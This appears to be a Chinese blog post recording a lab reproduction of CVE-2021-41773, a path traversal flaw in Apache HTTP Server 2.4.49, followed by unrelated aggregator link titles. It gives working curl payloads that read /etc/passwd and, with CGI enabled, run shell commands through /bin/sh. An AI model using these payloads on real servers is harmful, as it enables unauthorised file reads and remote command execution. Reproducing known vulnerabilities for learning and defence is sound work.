CVE-2021-41773/Apache HTTP Server 路径穿越漏洞
Posted 末 初
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2021-41773/Apache HTTP Server 路径穿越漏洞相关的知识,希望对你有一定的参考价值。
自己的一次简单的漏洞复现记录
学习请移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md
- https://httpd.apache.org/security/vulnerabilities_24.html
- 影响版本:
=2.4.49
- 利用条件:穿越的目录允许被访问,比如配置了
<Directory />Require all granted</Directory>
。(默认情况下是不允许的:<Directory />Require all denied</Directory>
)
满足以上两个条件即可造成路径穿越,可以进行任意文件读取
注意:这里的/icons/
必须是一个存在且可访问的目录
payload
curl -v --path-as-is http://your-ip:your-port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
在服务端开启了cgi
或cgid
这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:
ScriptAlias
与Alias
指令非常相似,都是定义了映射到一个特定目录的URL前缀,两者一般都用于指定位于DocumentRoot
以外的目录,其不同之处是ScriptAlias
又多了一层含义,即URL前缀后面的任何文件都被视为CGI程序
。所以,上述配置会指示Apache任何以/cgi-bin/
开头的资源都将映射到/usr/local/apache2/cgi-bin/
目录中,且视之为CGI程序
。
payload
curl --data "echo;id" 'http://your-ip:your-port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
echo;cat /etc/passwd
以上是关于CVE-2021-41773/Apache HTTP Server 路径穿越漏洞的主要内容,如果未能解决你的问题,请参考以下文章
Azure api OAuth2 隐式流适用于 http 但不适用于 htt
java 示例登录Android上的Google登录活动,该活动检索用于服务器端身份验证的授权代码。见htt
Confluence 6 通过 SSL 或 HTTPS 运行 - 重定向所有的 URLS 到 HTT
java.lang.IncompatibleClassChangeError:类 'org.apache.http.message.BasicHeader' 未实现接口 'org.apache.htt
css 以下内容将在#navToggle中添加/删除一个类,以便您可以在打开的移动菜单中添加活动的类/更改图标 - 请参阅示例htt